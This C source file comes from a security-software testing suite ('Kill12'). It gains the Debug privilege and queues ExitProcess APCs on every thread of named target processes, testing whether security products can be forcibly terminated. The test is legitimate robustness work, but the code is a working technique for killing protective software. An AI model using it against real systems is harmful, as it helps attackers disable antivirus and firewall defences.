/*

 Security Software Testing Suite - Kill12 (termination test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * A similar technique is used by Comodo HIPS and Firewall Leak Test Suite - DLL Injection 1,
     http://personalfirewall.comodo.com/cltinfo.html.


 Method description:

   * Obtain the Debug privilege.

   * Open a thread of the target process and schedule a user-mode APC to execute the ExitProcess API.
     Repeat this step for every thread of the target process.

   * This test works with a list of processes and reports success if at least one process was terminated.

*/

#include <stdio.h>
#include <windows.h>
#include "include/common.h"
#include "include/common-hook.h"


int main(int argc,char **argv)
{
  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  COM_CONF conf;
  if (!com_console_init_main("Kill12","kill12",argc,argv,&conf,COM_TEST_TYPE_KILL12)) return 1;

  char *used_dlls[]={"ntdll.dll","kernel32.dll"};
  if (!com_hook_load_libraries(used_dlls,2)) return 1;

  if (!com_privilege_enable_debug(&err_inf))
    com_err_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX);


  HMODULE kernel=GetModuleHandle("kernel32.dll");
  if (kernel)
  {
    if (com_verbosity_get()) printf("\"kernel32.dll\" found at 0x%p.\n",kernel);

    void *ExitProcess_addr=GetProcAddress(kernel,"ExitProcess");
    if (ExitProcess_addr)
    {
      if (com_verbosity_get()) printf("\"ExitProcess\" found in \"kernel32.dll\" at 0x%p.\n\n",ExitProcess_addr);

      ULONG pids[conf.processes_cnt];
      int ret=com_proc_get_pids_from_names(conf.processes,pids,conf.processes_cnt,&err_inf);
      if (ret)
      {
        for (int i=0;i<conf.processes_cnt;i++)
        {
          ULONG pid=pids[i];

          if (pid!=COM_CID_INVALID)
          {
            if (com_verbosity_get()) printf("Process \"%s\" found with PID %ld.\n",conf.processes[i],pid);

            ULONG tids[256];
            int tids_cnt=256;
            if (com_get_tids_from_pid(pid,tids,&tids_cnt,&err_inf))
            {
              if (com_verbosity_get()) printf("%d thread(s) found in process \"%s\" (PID %ld).\n",tids_cnt,conf.processes[i],pid);

              for (int j=0;j<tids_cnt;j++)
              {
                HANDLE thread=NULL;
                if (com_thread_open(tids[j],THREAD_SET_CONTEXT,TRUE,TRUE,&thread,&err_inf))
                {
                  if (QueueUserAPC(ExitProcess_addr,thread,0))
                    printf("The user-mode APC to the thread TID %ld (PID %ld, process name \"%s\") was scheduled.\n",tids[j],pid,conf.processes[i]);
                  else com_err_set_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX,"Unable to schedule the user-mode APC to the thread TID %ld (PID %ld, process name \"%s\").\n",
                                               tids[j],pid,conf.processes[i]);

                  CloseHandle(thread);
                } else com_err_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX);
              }
            } else com_err_print_clear(&err_inf,COM_ERR_STANDARD_PREFIX);

            if (com_verbosity_get()) printf("\n");
          } else if (ret) fprintf(stderr,"ERROR: Unable to find process \"%s\".\n\n",conf.processes[i]);
        }

        printf("Try to work with the target processes in next 20 seconds to terminate them.\n\n");
        Sleep(20000);

        res=com_proc_termination_report(conf.processes,pids,conf.processes_cnt,&err_inf);
      }
    } else com_err_set(&err_inf,"Unable to get address of \"ExitProcess\" in \"kernel32.dll\".\n");
  } else com_err_set(&err_inf,"Unable to find \"kernel32.dll\" in my address space.\n");

  return com_end(res,&err_inf,&conf);
}
